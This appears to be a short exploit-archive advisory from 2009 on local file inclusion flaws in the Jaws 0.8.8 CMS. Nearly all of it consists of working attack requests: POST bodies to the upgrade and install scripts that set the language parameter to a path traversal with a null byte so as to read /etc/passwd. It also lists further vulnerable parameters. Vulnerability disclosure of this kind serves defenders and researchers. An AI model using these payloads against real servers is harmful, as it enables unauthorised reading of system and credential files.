id: 4793
date: 02/04/2009
title: Jaws 0.8.8 Multiple Local File Inclusion Vulnerabilities
author: fuzion
cves: 

========================================================
Jaws 0.8.8 Multiple Local File Inclusion Vulnerabilities
========================================================


Jaws 0.8.8 Local File Inclusion

POST /upgrade/index.php
language=../../../../../../../../../../../../etc/passwd%00

POST /install/index.php
language=../../../../../../../../../../../../etc/passwd%00
Also vulnerable:
Introduction_complete
use_log

Author notified: Jan 24



#  0day.today [2023-03-27]  #